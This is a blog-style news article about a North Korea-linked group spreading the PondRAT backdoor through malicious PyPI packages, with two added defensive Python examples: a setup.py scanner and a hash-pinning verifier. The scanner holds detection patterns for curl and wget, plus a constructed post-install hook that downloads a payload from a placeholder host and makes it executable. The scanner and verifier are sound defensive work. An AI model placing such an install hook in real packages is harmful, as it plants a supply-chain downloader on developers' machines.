Malicious Python Packages Deliver PondRAT Backdoor: North Korean Group Targets Developers

North Korea-linked group Gleaming Pisces APT infiltrates Python’s PyPI repository with malicious packages, aiming to infect developers and compromise supply chains.

Unit 42 researchers have recently uncovered an ongoing campaign in which the North Korea-linked APT group Gleaming Pisces (also known as Citrine Sleet) distributes the new PondRAT backdoor through infected Python packages. This brilliant campaign poses a significant threat, as the attackers are planting malicious packages in the Python Package Index (PyPI) repository and using them to spread across supply chains.

Gleaming Pisces, a group active since at least 2018, is notorious for sophisticated attacks mostly targeting the cryptocurrency industry.

The malicious packages identified in the PyPI repository include:

  • real-ids (893 downloads, versions 0.0.3 – 0.0.5)
  • coloredtxt (381 downloads, version 0.0.2)
  • beautifultext (736 downloads, version 0.0.1)
  • minisound (416 downloads, version 0.0.2)

Although these packages have been removed, their download counts suggest a potentially widespread impact, though the actual number of affected systems cannot be accurately determined.

PondRAT: A Lighter Variant of POOLRAT

PondRAT appears to be a streamlined version of POOLRAT (also known as SIMPLESEA), a macOS remote administration tool previously distributed by the same threat actor. Palo Alto's analysis shows that PondRAT shares significant code similarities with POOLRAT, including overlapping structures, identical function names, encryption keys, and similar execution flows. Basically a fork of the previous project, which makes me want to make a joke: do threat actors work in sprints, using Jira? Lol.

The malware supports basic commands such as uploading and downloading files, and executing commands with output retrieval. Despite its limited functionality compared to POOLRAT, this software proves more than enough for maintaining unauthorized access to compromised systems. Going by the saying, less is more: fewer features, a smaller size, and faster transfer.

Infection Chain and Attack Methodology

The attack starts when a developer installs one of the poisoned Python packages. Upon installation, the malicious package executes code that runs several bash commands to download the PondRAT backdoor, modify its permissions, and execute it. This process allows the attackers to establish a foothold in the developer’s system without immediate detection.
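The install-time behaviour described above (a setup.py that shells out to fetch, chmod and launch a binary while `pip install` runs) is exactly what a reviewer can look for before installing an sdist. The following is an added example, not code from the Unit 42 report or from the packages it names: it walks the AST of a setup.py and flags calls to `os.system`, `subprocess.*`, `eval`/`exec`, plus string constants that look like shell download-and-run fragments. The `SAMPLE_SETUP_PY` and `CLEAN_SETUP_PY` texts are constructed for the demo; the real packages' setup scripts are not on the page.

```python
"""Static check for install-time command execution in a Python package's setup.py.

Added example (not the article's or the attackers' code). It flags the pattern the
article describes: a setup.py that shells out during `pip install`. The sample
setup.py sources below are constructed for the demo.
"""
import ast
import re
from dataclasses import dataclass

# Functions that hand control to a shell or to dynamically built code at install time.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.call",
    "subprocess.Popen", "subprocess.check_output", "subprocess.check_call",
    "eval", "exec",
}
# Shell fragments that have no business in a build script: fetch, chmod, run from /tmp.
SHELL_HINTS = re.compile(r"\b(curl|wget|chmod\s+\+x|bash\s+-c|/tmp/)")


@dataclass
class Finding:
    lineno: int
    reason: str


def _dotted_name(node: ast.AST) -> str:
    """Render call targets such as `os.system`, `subprocess.run` or `exec` as dotted strings."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def scan_setup_py(source: str) -> list[Finding]:
    """Return one Finding per suspicious call or shell-looking string in setup.py source.

    ast.walk visits every node, so hooks hidden in a custom `cmdclass` (the usual
    place for post-install code) are covered as well as module-level statements.
    """
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append(Finding(node.lineno, f"call to {name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            match = SHELL_HINTS.search(node.value)
            if match:
                findings.append(Finding(node.lineno, f"shell fragment {match.group(0)!r} in string"))
    return findings


# Constructed sample: a post-install hook that fetches and marks a file executable.
# The host name is a reserved .invalid domain and resolves nowhere.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import os

class PostInstall(install):
    def run(self):
        install.run(self)
        # constructed sample of the behaviour the article describes
        os.system("curl -s -o /tmp/payload https://example.invalid/p && chmod +x /tmp/payload")

setup(name="demo-pkg", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample of an ordinary, declarative setup.py.
CLEAN_SETUP_PY = 'from setuptools import setup\nsetup(name="demo-clean", version="1.0.0")\n'

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("clean", CLEAN_SETUP_PY)):
        for f in scan_setup_py(src):
            print(f"{label}: line {f.lineno}: {f.reason}")
```

Run it against the unpacked sdist (`pip download --no-binary :all: --no-deps <pkg>` fetches the archive without installing it) before the first `pip install`. The check is deliberately simple: base64 blobs, string concatenation or code pulled in at runtime will slip past it, so treat a clean result as "nothing obvious", not as a verdict.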

Preventive Measures

Developers are encouraged to carefully test, or at the very least audit, the packages they incorporate into their projects. Verifying checksums and using signed packages can help streamline the process and ensure integrity.
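Checksum verification in practice means pinning every dependency to a known artifact digest and refusing anything that does not match. pip ships this as hash-checking mode (`pip install --require-hashes -r requirements.txt`, with digests taken from `pip hash <file>`). The block below is an added example, not the article's code and not pip's own implementation: it re-creates the two decisions that mode makes, rejecting unpinned requirements and rejecting artifacts whose digest differs, for a requirements file and an artifact held in memory so it runs offline. The requirement lines and the sdist bytes are constructed for the demo.

```python
"""Hash-pinned dependency check in the style of `pip install --require-hashes`.

Added example (not the article's code, not pip's implementation). The requirements
text and artifact bytes below are constructed for the demo.
"""
import hashlib
import hmac
import re

# Matches one `--hash=sha256:<hex>` option; a requirement may carry several.
HASH_OPT = re.compile(r"--hash=(?P<alg>[a-z0-9]+):(?P<digest>[0-9a-fA-F]+)")
ALLOWED_ALGS = {"sha256", "sha384", "sha512"}  # weaker digests are ignored


def parse_requirements(text: str) -> dict[str, set[tuple[str, str]]]:
    """Map each requirement line to its pinned (algorithm, digest) pairs.

    Handles backslash line continuation, comments and blank lines. A requirement
    without hashes maps to an empty set, which verify_artifact treats as a failure.
    """
    joined = re.sub(r"\\\n\s*", " ", text)  # fold `\`-continued lines
    pins: dict[str, set[tuple[str, str]]] = {}
    for raw in joined.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        parts = line.split()
        req, opts = parts[0], " ".join(parts[1:])
        pins[req] = {(m["alg"], m["digest"].lower()) for m in HASH_OPT.finditer(opts)}
    return pins


def verify_artifact(req: str, data: bytes, pins: dict[str, set[tuple[str, str]]]) -> bool:
    """True only if `data` matches one of the digests pinned for `req`."""
    expected = pins.get(req, set())
    if not expected:
        return False  # unpinned dependency: refuse, as --require-hashes does
    for alg, digest in expected:
        if alg not in ALLOWED_ALGS:
            continue
        actual = hashlib.new(alg, data).hexdigest()
        if hmac.compare_digest(actual, digest):
            return True
    return False


# Constructed artifact standing in for a downloaded sdist, plus a tampered copy.
GOOD_SDIST = b"constructed sdist bytes for demo-pkg 1.0.0\n"
GOOD_SHA256 = hashlib.sha256(GOOD_SDIST).hexdigest()
TAMPERED_SDIST = GOOD_SDIST + b"# injected\n"

# Constructed requirements file: one properly pinned entry, one with no hash at all.
REQUIREMENTS = f"""\
# constructed requirements file
demo-pkg==1.0.0 \\
    --hash=sha256:{GOOD_SHA256}
unpinned-pkg==0.0.2
"""

if __name__ == "__main__":
    pins = parse_requirements(REQUIREMENTS)
    for name, blob in (("demo-pkg==1.0.0", GOOD_SDIST), ("demo-pkg==1.0.0", TAMPERED_SDIST)):
        print(name, "ok" if verify_artifact(name, blob, pins) else "REJECTED")
    print("unpinned-pkg==0.0.2", "ok" if verify_artifact("unpinned-pkg==0.0.2", b"", pins) else "REJECTED")
```

The unpinned case is the important one: a single dependency without a `--hash` makes pip abort the whole install in hash-checking mode, which is what stops a freshly published look-alike package from being pulled in by a loose version range.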

Organizations should conduct frequent security assessments of their software supply chains to identify and mitigate potential vulnerabilities.

Conclusion

"The evidence of additional Linux variants of POOLRAT shows that Gleaming Pisces has been enhancing its capabilities across both Linux and macOS platforms," concludes the Unit 42 report. The cross-platform capability proves again how sophisticated the malicious tools get with each iteration.

While I might not be able to resist a joke or two, this campaign is extremely serious and is not the first to target developers. This time, the focus was on Python, whereas previous campaigns targeted the JavaScript Node.js ecosystem. It raises concerns about how many similar operations are active or attempting to infiltrate other platforms. Robust protection measures must be in place before an attacker gains access to a developer's machine, because even with them, entire networks remain at risk once that happens.

Source: https://unit42.paloaltonetworks.com/gleaming-pisces-applejeus-poolrat-and-pondrat/

Photo by Christina Morillo: https://www.pexels.com/photo/python-book-1181671/